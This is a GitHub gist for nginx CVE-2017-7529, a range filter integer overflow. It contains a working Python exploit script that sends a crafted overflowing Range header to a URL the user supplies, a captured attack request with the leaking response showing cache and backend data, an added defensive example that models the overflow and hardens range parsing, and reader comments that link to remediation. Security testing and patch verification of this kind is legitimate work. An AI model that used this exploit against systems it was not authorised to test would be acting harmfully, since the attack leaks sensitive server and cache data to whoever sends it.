@thehappydinoa
Last active November 27, 2022 18:07
Nginx - Remote Integer Overflow Vulnerability

CVE 2017-7529

Nginx versions from 0.5.6 up to and including 1.13.2 are vulnerable to an integer overflow in the nginx range filter module, which can leak potentially sensitive information when triggered by a specially crafted request.

Make sure the requests module is installed.

Usage

usage: python CVE_2017_7529.py [-h] url

Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529

positional arguments:
  url         URL to test

optional arguments:
  -h, --help  show this help message and exit

Requests

GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT


--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png
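The capture above shows the effect of the overflow: the first suffix range resolves to a negative start ("bytes -623-16584/16585"), and the response body then carries the cache file header and the backend's original response instead of only the image. The following Python is an added example, not part of the gist and not nginx's own code. It parses a byte-range set with unbounded integers, resolves suffix ranges against the real content length and refuses any set whose parts add up to more than the resource; beside it is a simplified model, an assumption rather than nginx's implementation, of size arithmetic done in a signed 64-bit variable, which shows why the wrapped sum passes a "size must not exceed the resource" check. The Range header and content length are the ones from the capture.

```python
import re

INT64_MAX = 2**63 - 1
UINT64 = 2**64

# Range header and resource size taken from the capture on this page.
PAGE_RANGE = "bytes=-17208,-9223372036854758792"
PAGE_CONTENT_LENGTH = 16585

_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_byte_ranges(header):
    """Split a Range header into (start, end) pairs.

    A suffix range "-N" is returned as (None, N) and an open range "S-"
    as (S, None). Returns None when the header is not a byte-range set.
    """
    if not header.startswith("bytes="):
        return None
    specs = []
    for spec in header[len("bytes="):].split(","):
        m = _SPEC.match(spec.strip())
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None
        start = int(m.group(1)) if m.group(1) else None
        end = int(m.group(2)) if m.group(2) else None
        if start is not None and end is not None and end < start:
            return None
        specs.append((start, end))
    return specs or None


def wrap_int64(n):
    """Reduce an integer to the value a signed 64-bit variable would hold."""
    n %= UINT64
    return n - UINT64 if n > INT64_MAX else n


def naive_total_size(header, content_length):
    """Simplified model (an assumption, not nginx's code) of range size
    arithmetic in a signed 64-bit integer: suffix lengths are added without
    first being limited to content_length, so the sum can wrap negative."""
    size = 0
    for start, end in parse_byte_ranges(header) or []:
        if start is None:  # suffix range: the last `end` bytes
            size = wrap_int64(size + end)
        else:
            last = end if end is not None else content_length - 1
            size = wrap_int64(size + (last - start + 1))
    return size


def naive_accepts(header, content_length):
    """A 'total size must not exceed the resource' check passes when the
    wrapped sum is negative; that is the CVE-2017-7529 condition."""
    return naive_total_size(header, content_length) <= content_length


def resolve_ranges(header, content_length):
    """Hardened resolution: limit every range to the resource, reject empty
    suffixes and starts past the end, and refuse the whole set when the
    parts add up to more than the resource (the server then answers with
    the full body or 416). Returns absolute (first, last) pairs or None."""
    specs = parse_byte_ranges(header)
    if specs is None:
        return None
    resolved = []
    total = 0
    for start, end in specs:
        if start is None:
            if end == 0:
                return None
            length = min(end, content_length)  # never a negative start
            first, last = content_length - length, content_length - 1
        else:
            if start >= content_length:
                return None
            first = start
            last = content_length - 1 if end is None else min(end, content_length - 1)
        resolved.append((first, last))
        total += last - first + 1
        if total > content_length:
            return None
    return resolved


if __name__ == "__main__":
    print("wrapped size:", naive_total_size(PAGE_RANGE, PAGE_CONTENT_LENGTH))
    print("naive check accepts:", naive_accepts(PAGE_RANGE, PAGE_CONTENT_LENGTH))
    print("hardened resolution:", resolve_ranges(PAGE_RANGE, PAGE_CONTENT_LENGTH))
```

Run against the page's header, the modelled 64-bit sum comes out negative and is accepted, while the hardened resolver clamps each suffix to the full resource, notices that two full copies exceed it, and returns None. A proxy or application in front of an unpatched nginx can apply the same rule to drop such requests, and the negative wrapped total is also a usable signature for a WAF or log-based detection of attempts.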
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529
import sys
import logging
import argparse

try:
    import requests
    from requests.packages.urllib3.exceptions import InsecureRequestWarning

    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
    print("Please install the requests module.")
    sys.exit(1)

logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def send_request(url, headers=None, timeout=8):
    # Certificate verification is disabled (the urllib3 warning is silenced above)
    # so that hosts with self-signed certificates can be checked.
    kwargs = {"headers": headers, "timeout": timeout, "verify": False}
    response = requests.get(url, **kwargs)
    http_headers = response.headers
    log.info("status: %s", response.status_code)
    log.info("server: %s", http_headers.get("Server", ""))
    return response


def exploit(url):
    log.info("target: %s", url)
    # First request: learn the resource size from Content-Length.
    response = send_request(url)
    content_length = response.headers.get("Content-Length", 0)
    bytes_length = int(content_length) + 623
    # Two suffix ranges whose lengths always sum to 9223372036854776000,
    # just past 2**63 - 1, so the range filter's size arithmetic overflows
    # on unpatched versions.
    range_header = "bytes=-%d,-9223372036854%d" % (
        bytes_length,
        776000 - bytes_length,
    )
    response = send_request(url, headers={"Range": range_header})
    if response.status_code == 206 and "Content-Range" in response.headers:
        log.info("vulnerable?: Vulnerable to CVE-2017-7529")
    elif response.status_code == 416:
        log.warning("vulnerable?: Not Vulnerable (Range Not Satisfiable)")
    else:
        log.info("vulnerable?: Unknown (%s)", response.status_code)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529"
    )
    parser.add_argument("url", help="URL to test", type=str)
    args = parser.parse_args()
    url = requests.utils.urlparse(args.url)
    if not url.scheme:
        print(
            "URL scheme specifier is missing. Please include either 'http://' or 'https://'."
        )
        sys.exit(1)
    if not url.path:
        print("URL path is missing. Please include a full path.")
        sys.exit(1)
    exploit(args.url)
@unknownfeature

Folks! If you are using this script and getting an error but can't look at the code and figure it out, please, start doing something else!
To author: thank you very much!

@dimassahid

I got "vulnerable" on my website using this code, then what should I do next? And what's the proof that it's vulnerable? Because I just got the status "vulnerable", not sensitive data or anything else.

@thehappydinoa
Author

@dimas354313 to protect yourself use these remediation steps: https://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html

@dimassahid

@thehappydinoa ok, thanks a lot for your response
